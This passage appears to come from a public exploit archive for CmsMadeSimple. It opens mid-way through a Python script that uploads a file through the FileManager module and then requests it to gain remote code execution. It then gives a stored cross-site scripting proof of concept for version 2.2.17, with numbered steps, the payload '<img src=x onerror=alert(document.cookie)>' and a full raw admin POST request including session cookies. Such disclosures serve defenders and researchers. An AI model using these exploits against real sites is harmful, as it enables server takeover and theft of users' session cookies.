= { 'm1_files[]': open(file_path, 'rb') } data = { 'mact': 'FileManager,m1_,upload,0', '__c': session.cookies['__c'], 'disable_buffer': '1' } response = session.post(upload_url, files=files, data=data) if response.status_code == 200: print('file upload') rce_url=f"http://localhost/uploads/{file_path}" rce=requests.get(rce_url) print(rce.text) else: print('file not upload')

#Exploit Title: CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS) #Application: CmsMadeSimple #Version: v2.2.17 #Bugs: Stored Xss #Technology: PHP #Vendor URL: https://www.cmsmadesimple.org/ #Software Link: https://www.cmsmadesimple.org/downloads/cmsms #Date of found: 12-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Login to account 2. Go to Content Manager 3. Add New Content 4. Type as '<img src=x onerror=alert(document.cookie)>' to metadata section payload: <img src=x onerror=alert(document.cookie)> 5. Submit Content 6. Visit Content (http://localhost/index.php?page=test) Request: POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=5c64b42fb42c1d6bba6&showtemplate=false HTTP/1.1 Host: localhost Content-Length: 584 sec-ch-ua: Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CMSSESSID852a6e69ca02=g13p5ucajc0v5tker6ifdcaso5; 34a3083b62a225efa0bc6b5b43335d226264c2c1=24f612918e7b1c1e085bed5cab82f2a786f45d5c%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkLndYMkFFZnc4WTJlcWhhQVJ2LndZT1FVY09hTzMzeVlNYzVDU1V5NnFRQkxkeXJZNUozSTYifQ%3D%3D; __c=5c64b42fb42c1d6bba6 Connection: close mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=5c64b42fb42c1d6bba6&m1_content_id=0&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3Etest%3C%2Fp%3E&menutext=&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&pagedata=&design_id=2&template_id=10&alias=&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&additional_editors=&m1_ajax=1&m1_apply=1